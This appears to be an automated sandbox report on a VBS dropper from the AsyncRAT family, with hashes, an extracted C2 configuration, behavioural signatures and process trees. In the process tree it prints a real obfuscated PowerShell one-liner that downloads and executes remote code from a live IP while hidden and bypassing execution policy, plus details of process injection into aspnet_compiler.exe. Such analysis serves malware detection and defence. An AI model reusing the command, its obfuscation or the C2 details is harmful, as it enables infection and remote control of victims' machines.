Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29/01/2025, 02:39
Static task
static1
Behavioral task
behavioral1
Sample
4f90acd8429781753e1b43f7c32efaa4ddc9fc108eaec01d9d1dd4ddc444208c.vbs
Resource
win7-20240903-en
General
-
Target
4f90acd8429781753e1b43f7c32efaa4ddc9fc108eaec01d9d1dd4ddc444208c.vbs
-
Size
6KB
-
MD5
5cd058a830624c948fcf2e91589e523c
-
SHA1
f3ff01a26d55f8c01dc6d930afc526653164e2fd
-
SHA256
4f90acd8429781753e1b43f7c32efaa4ddc9fc108eaec01d9d1dd4ddc444208c
-
SHA512
786773fd9d87fa23680cface7236c349b560c7ad4241624f91a6fd6d6cfc05d7e554555614b93a78a2be8000b2c4e5c1b1fca9a312bd68a77cbab1b38ff23370
-
SSDEEP
96:ej/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/3:8PjGZOmya03D
Malware Config
Extracted
asyncrat
AWS | 3Losh
00000001
81.10.39.58:7077
AsyncMutex_alosh
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Blocklisted process makes network request 3 IoCs
flow pid Process 15 3732 powershell.exe 23 3732 powershell.exe 26 3732 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 3732 powershell.exe 1540 powershell.exe 1792 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation WScript.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 22 api.ipify.org 23 api.ipify.org -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1540 set thread context of 2364 1540 powershell.exe 95 PID 1792 set thread context of 3720 1792 powershell.exe 109 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3732 powershell.exe 3732 powershell.exe 1540 powershell.exe 1540 powershell.exe 2364 aspnet_compiler.exe 1792 powershell.exe 1792 powershell.exe 1792 powershell.exe 1792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeDebugPrivilege 3732 powershell.exe Token: SeIncreaseQuotaPrivilege 3732 powershell.exe Token: SeSecurityPrivilege 3732 powershell.exe Token: SeTakeOwnershipPrivilege 3732 powershell.exe Token: SeLoadDriverPrivilege 3732 powershell.exe Token: SeSystemProfilePrivilege 3732 powershell.exe Token: SeSystemtimePrivilege 3732 powershell.exe Token: SeProfSingleProcessPrivilege 3732 powershell.exe Token: SeIncBasePriorityPrivilege 3732 powershell.exe Token: SeCreatePagefilePrivilege 3732 powershell.exe Token: SeBackupPrivilege 3732 powershell.exe Token: SeRestorePrivilege 3732 powershell.exe Token: SeShutdownPrivilege 3732 powershell.exe Token: SeDebugPrivilege 3732 powershell.exe Token: SeSystemEnvironmentPrivilege 3732 powershell.exe Token: SeRemoteShutdownPrivilege 3732 powershell.exe Token: SeUndockPrivilege 3732 powershell.exe Token: SeManageVolumePrivilege 3732 powershell.exe Token: 33 3732 powershell.exe Token: 34 3732 powershell.exe Token: 35 3732 powershell.exe Token: 36 3732 powershell.exe Token: SeIncreaseQuotaPrivilege 3732 powershell.exe Token: SeSecurityPrivilege 3732 powershell.exe Token: SeTakeOwnershipPrivilege 3732 powershell.exe Token: SeLoadDriverPrivilege 3732 powershell.exe Token: SeSystemProfilePrivilege 3732 powershell.exe Token: SeSystemtimePrivilege 3732 powershell.exe Token: SeProfSingleProcessPrivilege 3732 powershell.exe Token: SeIncBasePriorityPrivilege 3732 powershell.exe Token: SeCreatePagefilePrivilege 3732 powershell.exe Token: SeBackupPrivilege 3732 powershell.exe Token: SeRestorePrivilege 3732 powershell.exe Token: SeShutdownPrivilege 3732 powershell.exe Token: SeDebugPrivilege 3732 powershell.exe Token: SeSystemEnvironmentPrivilege 3732 powershell.exe Token: SeRemoteShutdownPrivilege 3732 powershell.exe Token: SeUndockPrivilege 3732 powershell.exe Token: SeManageVolumePrivilege 3732 powershell.exe Token: 33 3732 powershell.exe Token: 34 3732 powershell.exe Token: 35 3732 powershell.exe Token: 36 3732 powershell.exe Token: SeDebugPrivilege 1540 powershell.exe Token: SeDebugPrivilege 2364 aspnet_compiler.exe Token: SeDebugPrivilege 1792 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2364 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 37 IoCs
description pid Process procid_target PID 4592 wrote to memory of 3732 4592 WScript.exe 82 PID 4592 wrote to memory of 3732 4592 WScript.exe 82 PID 3176 wrote to memory of 3344 3176 WScript.exe 86 PID 3176 wrote to memory of 3344 3176 WScript.exe 86 PID 3344 wrote to memory of 4668 3344 net.exe 88 PID 3344 wrote to memory of 4668 3344 net.exe 88 PID 3176 wrote to memory of 4840 3176 WScript.exe 89 PID 3176 wrote to memory of 4840 3176 WScript.exe 89 PID 4840 wrote to memory of 1540 4840 cmd.exe 91 PID 4840 wrote to memory of 1540 4840 cmd.exe 91 PID 1540 wrote to memory of 2364 1540 powershell.exe 95 PID 1540 wrote to memory of 2364 1540 powershell.exe 95 PID 1540 wrote to memory of 2364 1540 powershell.exe 95 PID 1540 wrote to memory of 2364 1540 powershell.exe 95 PID 1540 wrote to memory of 2364 1540 powershell.exe 95 PID 1540 wrote to memory of 2364 1540 powershell.exe 95 PID 1540 wrote to memory of 2364 1540 powershell.exe 95 PID 1540 wrote to memory of 2364 1540 powershell.exe 95 PID 4456 wrote to memory of 3304 4456 WScript.exe 102 PID 4456 wrote to memory of 3304 4456 WScript.exe 102 PID 3304 wrote to memory of 2100 3304 net.exe 104 PID 3304 wrote to memory of 2100 3304 net.exe 104 PID 4456 wrote to memory of 3008 4456 WScript.exe 105 PID 4456 wrote to memory of 3008 4456 WScript.exe 105 PID 3008 wrote to memory of 1792 3008 cmd.exe 107 PID 3008 wrote to memory of 1792 3008 cmd.exe 107 PID 1792 wrote to memory of 3632 1792 powershell.exe 108 PID 1792 wrote to memory of 3632 1792 powershell.exe 108 PID 1792 wrote to memory of 3632 1792 powershell.exe 108 PID 1792 wrote to memory of 3720 1792 powershell.exe 109 PID 1792 wrote to memory of 3720 1792 powershell.exe 109 PID 1792 wrote to memory of 3720 1792 powershell.exe 109 PID 1792 wrote to memory of 3720 1792 powershell.exe 109 PID 1792 wrote to memory of 3720 1792 powershell.exe 109 PID 1792 wrote to memory of 3720 1792 powershell.exe 109 PID 1792 wrote to memory of 3720 1792 powershell.exe 109 PID 1792 wrote to memory of 3720 1792 powershell.exe 109
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4f90acd8429781753e1b43f7c32efaa4ddc9fc108eaec01d9d1dd4ddc444208c.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$FmxQdSlWaGye='IeX(NeW-OBJeCT NeT.W';$KtWLqHZBjFgp='eBCLIeNT).DOWNLO';$UeivQcqgkxEH='repoooos(''http://45.88.186.162/test//update.php'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($FmxQdSlWaGye+$KtWLqHZBjFgp+$UeivQcqgkxEH);2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3732
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\Music\Ib1Gys4epo.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" session2⤵
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:4668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\Ib1Gys4epo.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Music\Ib1Gys4epo.ps1'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2364
-
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\Music\Ib1Gys4epo.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" session2⤵
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:2100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\Ib1Gys4epo.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Music\Ib1Gys4epo.ps1'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵PID:3632
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- System Location Discovery: System Language Discovery
PID:3720
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
1KB
MD5b29d1cb3e9761a90902c4a66a2ba3d5a
SHA163c64b29626976bc0a143d72f291bb50727dffbe
SHA256b998ed3cf206c4dac06d6028943a2f5accd73a93aca74420afe7480c464bf124
SHA51254bac9ee28a46f57bfac8fecb6d8af504cb483b70f62f06febd9768d4254b611a082c8191d93599ebfd4a5b75a85dd387b758db1439df89337473c8f68a3cd88
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2KB
MD52e065e7218829a163058fa097845dba2
SHA1aa6c63b9317f723389f550c433839ee136dd26ae
SHA256febb766116ce6cf0462bf23060b82a8cdf67591dd5b90a22bef4cd1f7c2f4f03
SHA512afb85022f0dbcecfbe8d17b65f99f5482e512be901e1f9c156cbdb962c5aa7ea8649ae2cbe976da27471e683b1b54fffbdd403c908b6608aa1e797da4926c519
-
Filesize
453KB
MD5d8502dea3a910acdb3e942e4f368c060
SHA117dd9d6ce7114818a3aaeecb9956fd4a93a94236
SHA25682106190d1a2850bde87107b6f76b2d68f2d5dc8211bd709f59158737fb42147
SHA5128318b7d3541a98ae618b581aee6b791355a6b6ec928ffb2563bf71affe3635c8c76a44535f0f8eda82db0a53660ad31a052b44b659ddbf80f144e2bc813a83d5
-
Filesize
4KB
MD5950ade446d464d618930a2b4f5e978cf
SHA17851452ce536e8a416ba4cbb540168a622930d2c
SHA256d799db5accfbf6d8cab01f9e749187e155fa1598bcc381d622bfc3f3b4244e73
SHA5120ff54c81a232932be47d07f64f1049cdf38fa0343a1ee2a1dc78f6c309721ca495330fd73fa5bda5fa3a3c1d835b93b20010ad21bba758b8e55f1c57d7ff3b24